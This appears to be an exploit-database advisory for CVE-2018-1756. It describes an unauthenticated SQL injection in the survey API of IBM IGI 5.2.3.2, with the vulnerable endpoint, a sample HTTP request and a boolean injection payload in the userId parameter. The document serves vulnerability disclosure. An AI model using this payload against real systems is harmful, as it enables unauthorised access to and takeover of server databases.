89530e070b
5 changes to exploits/shellcodes virtualenv 16.0.0 - Sandbox Escape NICO-FTP 3.0.1.19 - Buffer Overflow (SEH)(ASLR) LayerBB Forum 1.1.1 - 'search_query' SQL Injection Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (50 byes)
35 lines
No EOL
1.2 KiB
Text
35 lines
No EOL
1.2 KiB
Text
# Exploit Title: [Unauthenticated Remote SQLi]
|
|
# Date: [11/09/2018]
|
|
# Exploit Author: [Mohamed Sayed - From SecureMisr Company]
|
|
# Vendor Homepage: [https://www-01.ibm.com/support/docview.wss?uid=ibm10728883]
|
|
# Version: [IGI 5.2.3.2] (REQUIRED)
|
|
# Tested on: [Windows 10]
|
|
# CVE : [CVE-2018-1756]
|
|
|
|
Hello ,
|
|
IBM IGI version 5.2.3.2 is suffering from unauthenticated remote SQLi
|
|
The vulnerability enable *remote unauthenticated* attacker to take over the
|
|
server database and affect the confidentiality , integrity and availability
|
|
of the system ,
|
|
|
|
The vulnerability is in the survey end point API
|
|
/survey/api/config?userId=XXX
|
|
|
|
The userId parameter value is injected directly to a sql query without
|
|
sensitization nor validation and by exploiting it the attacker will be able
|
|
to gain access on the server database
|
|
|
|
SAMPLE of Vulnerable HTTP Request
|
|
|
|
GET /survey/api/config?userId=VUL HTTP/1.1
|
|
Host: HOST_IP
|
|
Connection: close
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
|
|
(KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36
|
|
Accept: */*
|
|
Referer: https://HOST_IP
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: en-US,en;q=0.9
|
|
|
|
Payload sample :
|
|
userId=1 'AND 1=1 AND '2'='2 |